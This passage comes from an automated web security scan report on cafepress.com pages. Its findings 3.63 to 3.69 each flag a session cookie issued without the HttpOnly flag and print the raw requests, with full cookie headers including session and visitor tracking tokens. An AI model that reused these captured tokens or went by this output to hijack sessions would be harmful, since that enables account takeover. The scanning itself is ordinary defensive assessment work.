HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 55427 Date: Sun, 26 Dec 2010 13:48:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55427 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.63. http://www.cafepress.com/make/custom-iphone-cases
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-iphone-cases
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 57068 Date: Sun, 26 Dec 2010 13:48:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.64. http://www.cafepress.com/make/custom-mugs
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/custom-mugs
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 53712
Date: Sun, 26 Dec 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 53712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.65. http://www.cafepress.com/make/custom-stickers
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/custom-stickers
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 55145
Date: Sun, 26 Dec 2010 13:47:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.66. http://www.cafepress.com/make/custom-stockings
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/custom-stockings
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 52596
Date: Sun, 26 Dec 2010 13:48:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 52596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.67. http://www.cafepress.com/make/custom-t-shirts
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/custom-t-shirts
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 112197
Date: Sun, 26 Dec 2010 13:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.68. http://www.cafepress.com/make/custom-thermos
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/custom-thermos
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 55367
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.69. http://www.cafepress.com/make/custom-water-bottles
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /make/custom-water-bottles
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 